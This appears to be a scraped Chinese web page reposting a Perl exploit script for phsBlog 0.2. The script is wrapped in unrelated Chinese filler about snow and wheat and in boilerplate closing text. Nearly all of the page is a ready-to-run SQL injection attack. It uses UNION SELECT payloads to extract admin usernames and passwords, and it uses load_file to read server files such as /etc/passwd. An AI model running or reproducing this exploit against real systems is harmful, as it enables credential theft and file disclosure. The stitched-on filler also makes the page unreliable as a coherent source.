phsBlog 0.2 Bypass SQL Injection Filtering Exploit

不是有一句谚语说道“冬天麦盖三层被,来年枕着馒头睡”吗?小麦和雪是好朋友,小麦感到寒冷的时候,雪会用自己温暖小麦的身躯;小麦感到炎热时,它便悄然离去。下雪时,树上房屋以及地上全都落满了雪,万里江山银装素裹,摇身变成了粉妆玉砌的山河;飞舞的雪花,像在梦中一般,真是“飘雪若梦”啊!
#!/usr/bin/perl
#----------------------------------------------------------------
#
#Script : PhsBlog v0.2
#
#Type : Bypass Sql injection Filtering Exploit
#
#Method : GET
#
#Risk : High
#
#----------------------------------------------------------------
#
#Discovered by : Khashayar Fereidani a.k.a. Dr.Crash
#
#My Official Website : HTTP://FEREIDANI.IR
#
#Khashayar Fereidani Email : irancrash [ a t ] gmail [ d o t] com
#
#----------------------------------------------------------------
#
#Khashayar Fereidani Official Website : HTTP://FEREIDANI.IR
#
#----------------------------------------------------------------
#
#Script Download : http://www.phsdev.com/downloads/phsblog_current.zip
#
#----------------------------------------------------------------
#
# Tnx : God
#
# HTTP://IRCRASH.COM
#
#---------------------------------------------------------------- use LWP;
use HTTP::Request;
use Getopt::Long;
$scriptname="PhsBlog v0.2"; sub header
{
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************";
} sub usage
{
print "
* Usage : perl $0 http://Example/
****************************************************
";
}
$url = ($ARGV[0]); if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
sub xpl1()
{
#concat(0x4c6f67696e3a,user,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e)
$vul = "/index.php?sql_cid=999'union select 0,1,2,3,4,concat(0x4c6f67696e3a,username,0x3c656e64757365723e,0x0d0a50617373776f72643a,password,0x3c656e64706173733e),6,7,8,9,10,11,12 from phsblog_users/*";
$requestpage = $url.$vul;
my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring); $response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string(); @name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0]; @password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0]; if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
} print "\n Username: ".$name."\n\n";
print " Password: " .$password."\n\n";
}
#XPL2 sub xpl2()
{
print "\n Example For File Address : /home/user/public_html/config.php\n Or /etc/passwd";
print "\n Enter File Address :";
$fil3 = <stdin>;
#index.php?sql_cid=999'union select 0,1,2,3,4,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),6,7,8,9,10,11,12 from phsblog_users/*
$vul = "?show=pickup&sid=99999' union select 0,concat(0x4c6f67696e3a,load_file('$fil3'),0x3c656e64757365723e),2,3,4,5,6,7,8,9,10,11,12,13 from mysql.user/*";
$requestpage = $url.$vul; my $req = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring); $response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();
@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];
if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
} open (FILE, ">".source.".txt");
print FILE $name;
close (FILE);
print " File Save In source.txt\n";
print ""; } #XPL2 END
#Starting;
print "
****************************************************
* $scriptname
****************************************************
*Discovered by : Khashayar Fereidani *
*Exploited by : Khashayar Fereidani *
*My Official Website : http://fereidani.ir *
****************************************************
* Mod Options : *
* Mod 1 : Find Script username and password *
* Mod 2 : File Disclosure(not work in many servers)*
****************************************************";
print "\n \n Enter Mod : ";
$mod=<stdin>;
if ($mod=="1" or $mod=="2") { print "\n Exploiting .............. \n"; } else { print "\n Unknown Mod ! \n Exploit Failed !"; };
if ($mod=="1") { xpl1(); };
if ($mod=="2") { xpl2(); };

到此这篇关于phsBlog 0.2 Bypass SQL Injection Filtering Exploit 就介绍到这了。世界上只有想不通的人,没有走不通的路。更多相关phsBlog 0.2 Bypass SQL Injection Filtering Exploit 内容请查看相关栏目,小编编辑不易,再次感谢大家的支持!

标签: